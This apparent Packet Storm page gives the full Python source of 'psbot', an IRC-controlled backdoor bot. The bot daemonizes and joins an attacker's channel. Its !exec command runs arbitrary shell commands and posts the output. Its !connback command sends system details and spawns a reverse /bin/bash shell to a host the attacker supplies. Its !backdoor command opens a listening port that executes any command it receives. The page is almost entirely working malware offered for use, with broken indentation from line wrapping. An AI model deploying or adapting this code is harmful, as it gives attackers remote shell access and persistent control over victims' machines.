Psbot is an IRC bot written in Python that allows for remote command execution, connectback functionality, and backdoors to be spawned.
8c142c6ef3e99b8404417916755ee0fdIt's an irc bot written on python that does these things
!exec <command>
to execute a command and prints the output in the irc root
!connback <host> <port>
to do a connect back and give a shell on <host>:<port>
!backdoor <port>
runs a backdoor where the bot is running
!die
Die!!
[image: http://0x80.org/blog/wp-content/uploads/2008/09/screenshot2.png]
here's the sourcecode (http://0x80.org/code/app/psbot/psbot)
#!/usr/bin/env python
##############################
# psbot.py v0.1 (qnix[at]0x80[dot]org
# irc bot that execute command and output them on a channel
# do a connect back and give a shell
# run a backdoor
##############################
import sys
from socket import *
import string
import os
import time
import popen2
import signal
def daemonize():
pid = os.fork()
if(pid != 0):
os._exit(0)
def main():
if len(sys.argv) < 5:
print "Usage:",sys.argv[0]," <host> <port> <nick> <channel>
(password)"
sys.exit(1)
HOST = sys.argv[1]
PORT = int(sys.argv[2])
NICK = sys.argv[3]
CHAN = sys.argv[4]
PASS = ""
if len(sys.argv) == 6:
PASS = sys.argv[5]
print "[+] Connecting to %s@%s:%s (chan:%s pass:%s)" % (NICK, HOST,
PORT, CHAN, PASS)
else:
print "[+] Connecting to %s@%s:%s (chan:%s)" % ( NICK, HOST, PORT,
CHAN )
print "[+] Done.."
readbuffer = ""
s = socket( )
try:
s.connect((HOST, PORT))
except:
print "[-] Couldn't connect to %s:%s" % (HOST, PORT)
sys.exit(1)
s.send("NICK %s\r\n" % NICK)
s.send("USER %s %s bla :%s\r\n" % (NICK , NICK, NICK))
if len(PASS) != 0:
s.send("JOIN %s %s\r\n" % (CHAN, PASS))
else:
s.send("JOIN %s\r\n" % (CHAN))
while 1:
readbuffer=readbuffer+s.recv(1024)
temp=string.split(readbuffer, "\n")
readbuffer=temp.pop()
for line in temp:
line=string.rstrip(line)
line=string.split(line)
try:
if line[1] == "JOIN":
name = str(line[0].split("!")[0])
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "Welcome ",
name.replace(":","") , "!!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN,
"|------------------------------|"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|
qnix[at]0x80[dot]org |"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| psbot.py
v0.1 |"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| type !help
for help |"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN,
"|------------------------------|"))
if line[3] == ":!help":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Displaying
list of commands the bot understands"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !exec
<command> - execute command"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !connback
<host> <port> - connback backdoor"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !backdoor
<port> - backdoor"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !die -
die!!"))
if line[3] == ":!exec":
temp = []
temp2 = []
for lines in line:
temp.append(lines)
if len(temp) > 4:
temp2.append(lines)
command = ' '.join(temp2)
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Executing
\"", command, "\""))
for line in os.popen(command).readlines():
s.send("PRIVMSG %s :%s\r\n" % (CHAN, line))
if line[3] == ":!connback":
if line[4] != "":
if line[5] != "":
host = line[4]
try:
port = int(line[5])
except:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-]
invalid port number"))
break
shell = "/bin/bash"
s.send("PRIVMSG %s :%s%s:%s\r\n" % (CHAN, "[+]
Connback to ", host, port))
s2 = socket(AF_INET, SOCK_STREAM)
try:
s2.connect((socket.gethostbyname(host),
port))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+]
Done"))
s2.send("########################################################\n")
s2.send("############## Psbot Connect-back
Backdoor #############\n")
s2.send("########################################################\n\n")
s2.send("UID: %s GID: %s\n" %
(os.getuid(),os.getgid()))
s2.send("Process ID: %s\n" % (os.getpid()))
s2.send("Current Directory: %s\n" %
(os.getcwd()))
for info in os.uname():
s2.send("System information: %s" %
(info))
s2.send("\nTime: %s\n\n" %
(time.ctime(time.time())))
except:
s.send("PRIVMSG %s :%s%s:%s\r\n" % (CHAN,
"[-] Couldn't connect to ", host, port))
os.dup2(s2.fileno(), 0)
os.dup2(s2.fileno(), 1)
os.dup2(s2.fileno(), 2)
os.system(shell)
if line[3] == ":!backdoor":
try:
port = int(line[4])
except:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Invalid
port"))
break
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Backdoor on
port ", port))
try:
s3 = socket(AF_INET,SOCK_STREAM)
s3.bind(('', port))
s3.listen(5)
s.send("PRIVMSG %s: %s\r\n" % (CHAN, "[+] Done!!"))
except:
s.send("PRIVMSG %s: %s%s\r\n" % (CHAN, "[-] Failed
SockError: ", sys.exc_value))
break
if os.fork()==0:
while 1:
connection,addreess=s3.accept()
data=connection.recv(1024)
if os.fork()==0:
while 1:
data=connection.recv(1024)
if not data:break
cmd_res,stdin,stderror=popen2.popen3(data[:-1])
result=cmd_res.read()
error=stderror.read()
if error:
connection.send(error)
for i in range(len(data.split())-1):
if 'cd' in data.split()[i]:
try:
os.chdir(data.split()[i+1].split(';')[0])
except:
error="[-]
Error"+str(sys.exc_value)+"\n"
connection.send(error)
username=os.popen("whoami").read()
adr=os.popen("uname -n").read()
if username[:-1]=='root':
simvol="# "
else:
simvol="> "
path=os.getcwd()
promt='['+username[:-1]+'@'+adr[:-1]+'
'+path+']'+simvol
answer=result+promt
connection.send(answer)
if line[3] == ":!die":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Killing
me.."))
myproc = popen2.Popen3("")
pgid = os.getpgid(myproc.pid)
os.killpg(pgid, signal.SIGKILL)
except(IndexError):
pass
if(line[0]=="PING"):
s.send("PONG %s\r\n" % line[1])
if __name__ == "__main__":
daemonize()
main()
--
Qnix < qnix@0x80.org >
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!